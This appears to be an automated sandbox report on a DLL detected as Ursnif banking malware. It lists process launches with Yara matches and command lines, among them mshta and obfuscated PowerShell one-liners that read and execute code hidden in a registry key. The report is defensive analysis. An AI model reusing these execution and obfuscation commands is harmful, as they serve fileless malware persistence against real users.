                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                        Reputation:moderate

                        General

                        Start time:10:33:06
                        Start date:14/12/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
                        Imagebase:0x150000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:10:33:07
                        Start date:14/12/2021
                        Path:C:\Windows\SysWOW64\regsvr32.exe
                        Wow64 process (32bit):true
                        Commandline:regsvr32.exe /s C:\Users\user\Desktop\6.dll
                        Imagebase:0xdd0000
                        File size:20992 bytes
                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                        Reputation:high

                        General

                        Start time:10:33:07
                        Start date:14/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\6.dll",#1
                        Imagebase:0x11a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                        Reputation:high

                        General

                        Start time:10:33:07
                        Start date:14/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
                        Imagebase:0x11a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                        Reputation:high

                        General

                        Start time:10:33:35
                        Start date:14/12/2021
                        Path:C:\Windows\System32\BackgroundTransferHost.exe
                        Wow64 process (32bit):false
                        Commandline:"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                        Imagebase:0x7ff64e5e0000
                        File size:36864 bytes
                        MD5 hash:02BA81746B929ECC9DB6665589B68335
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:10:34:12
                        Start date:14/12/2021
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                        Imagebase:0x7ff7f2bc0000
                        File size:14848 bytes
                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:10:34:12
                        Start date:14/12/2021
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                        Imagebase:0x7ff7f2bc0000
                        File size:14848 bytes
                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:10:34:12
                        Start date:14/12/2021
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                        Imagebase:0x7ff7f2bc0000
                        File size:14848 bytes
                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:10:34:15
                        Start date:14/12/2021
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                        Imagebase:0x7ff617cb0000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:high

                        General

                        Start time:10:34:16
                        Start date:14/12/2021
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                        Imagebase:0x7ff617cb0000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:high

                        General

                        Start time:10:34:16
                        Start date:14/12/2021
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                        Imagebase:0x7ff617cb0000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        General

                        Start time:10:34:16
                        Start date:14/12/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7ecfc0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:10:34:16
                        Start date:14/12/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7ecfc0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:10:34:16
                        Start date:14/12/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7ecfc0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:10:34:20
                        Start date:14/12/2021
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                        Imagebase:0x7ff7f2bc0000
                        File size:14848 bytes
                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:10:34:23
                        Start date:14/12/2021
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                        Imagebase:0x7ff617cb0000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        General

                        Start time:10:34:23
                        Start date:14/12/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7ecfc0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:10:34:26
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
                        Imagebase:0x7ff768110000
                        File size:2739304 bytes
                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        General

                        Start time:10:34:32
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
                        Imagebase:0x7ff62ec30000
                        File size:47280 bytes
                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:10:34:32
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
                        Imagebase:0x7ff768110000
                        File size:2739304 bytes
                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        General

                        Start time:10:34:32
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
                        Imagebase:0x7ff768110000
                        File size:2739304 bytes
                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        General

                        Start time:10:34:33
                        Start date:14/12/2021
                        Path:C:\Windows\System32\control.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\control.exe -h
                        Imagebase:0x7ff65b0e0000
                        File size:117760 bytes
                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:10:34:35
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
                        Imagebase:0x7ff768110000
                        File size:2739304 bytes
                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        General

                        Start time:10:34:35
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
                        Imagebase:0x7ff62ec30000
                        File size:47280 bytes
                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:10:34:36
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
                        Imagebase:0x7ff62ec30000
                        File size:47280 bytes
                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:10:34:37
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
                        Imagebase:0x7ff768110000
                        File size:2739304 bytes
                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        General

                        Start time:10:34:37
                        Start date:14/12/2021
                        Path:C:\Windows\System32\control.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\control.exe -h
                        Imagebase:0x7ff65b0e0000
                        File size:117760 bytes
                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:10:34:37
                        Start date:14/12/2021
                        Path:C:\Windows\System32\control.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\control.exe -h
                        Imagebase:0x7ff65b0e0000
                        File size:117760 bytes
                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:10:34:38
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
                        Imagebase:0x7ff62ec30000
                        File size:47280 bytes
                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:10:34:39
                        Start date:14/12/2021
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                        Imagebase:0x7ff6d6300000
                        File size:69632 bytes
                        MD5 hash:73C519F050C20580F8A62C849D49215A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Disassembly

                        Code Analysis
